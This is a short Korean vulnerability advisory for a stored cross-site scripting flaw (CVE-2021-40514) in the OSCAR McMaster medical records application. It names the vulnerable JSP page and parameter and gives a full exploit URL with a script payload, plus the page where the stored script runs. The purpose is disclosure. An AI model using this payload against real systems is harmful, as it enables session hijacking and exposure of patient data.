
CVE-2021-40514 OSCAR McMaster 19.40~1235 저장형 크로스 사이트 스크립팅 취약점.
OSCAR McMaster 애플리케이션 버전 19.40~1235의 여러 페이지에서 임의의 JavaScript 명령을 실행할 수 있는 저장형 크로스 사이트 스크립팅 취약점이 존재합니다.
[CVE mitre 자리 표시자]
취약한 JSP 페이지:
providercontrol.jsp - mygroupno 매개변수
취약 페이로드 예시:
/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0
저장된 응답은 다음 링크에서 사용자를 대상으로 실행됩니다:
/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth
2021년 8월, Jack McBride에 의해 발견됨.